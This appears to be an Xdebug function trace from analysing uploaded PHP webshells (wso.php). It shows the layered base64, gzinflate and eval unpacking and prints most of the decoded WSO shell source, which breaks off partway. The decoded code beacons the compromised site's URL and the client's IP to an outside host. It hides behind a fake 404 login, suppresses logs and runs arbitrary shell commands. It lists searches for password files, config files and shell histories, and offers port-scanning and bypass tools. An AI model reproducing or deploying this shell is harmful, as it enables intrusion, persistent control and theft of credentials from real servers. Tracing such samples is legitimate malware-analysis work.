4	32	1	0.656068	1148400
4	32	R			'1'
4	33	0	0.656081	1148328	ini_set	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	0.656097	1148432
4	33	R			'30'
4	34	0	0.656111	1148328	set_time_limit	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	0.656125	1148392
4	34	R			FALSE
3	12	1	0.656148	1149824
2	7	1	0.656165	1062800
1	3	1	0.656173	1061224
1	35	0	0.656181	1061256	Error->__toString	0		Unknown	0	0
2	36	0	0.656193	1061336	Error->getTraceAsString	0		Unknown	0	0
2	36	1	0.656205	1061592
2	36	R			'#0 /var/www/html/uploads/wso1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php(4): eval()\n#2 {main}'
1	35	1	0.656226	1065728
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php(4): eval()\n#2 {main}'
			0.656279	986224
TRACE END   [2023-02-12 22:48:00.093230]

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249972.0487.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:59:57.946581]
1	0	1	0.000179	393512
1	3	0	0.000410	426920	{main}	1		/var/www/html/uploads/wso.php	0	0
1		A						/var/www/html/uploads/wso.php	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/wso.php	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000492	426920	base64_decode	0		/var/www/html/uploads/wso.php	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000513	427080
2	4	R			'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	0	0.000535	427048	gzinflate	0		/var/www/html/uploads/wso.php	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000559	427176
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000576	427016	htmlspecialchars_decode	0		/var/www/html/uploads/wso.php	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000593	427048
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000624	428576	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/wso.php	4	0
3	8	0	0.000639	428576	strrev	0		/var/www/html/uploads/wso.php(4) : eval()'d code	1	1	'==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3	8	1	0.000692	461376
3	8	R			'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	0	0.000738	461344	base64_decode	0		/var/www/html/uploads/wso.php(4) : eval()'d code	1	1	'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	1	0.000854	494144
3	9	R			'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	0	0.001301	461344	gzinflate	0		/var/www/html/uploads/wso.php(4) : eval()'d code	1	1	'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	1	0.001785	485952
3	10	R			'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	0	0.002231	453152	gzuncompress	0		/var/www/html/uploads/wso.php(4) : eval()'d code	1	1	'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	1	0.002938	539200
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3	12	0	0.005696	1143752	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = 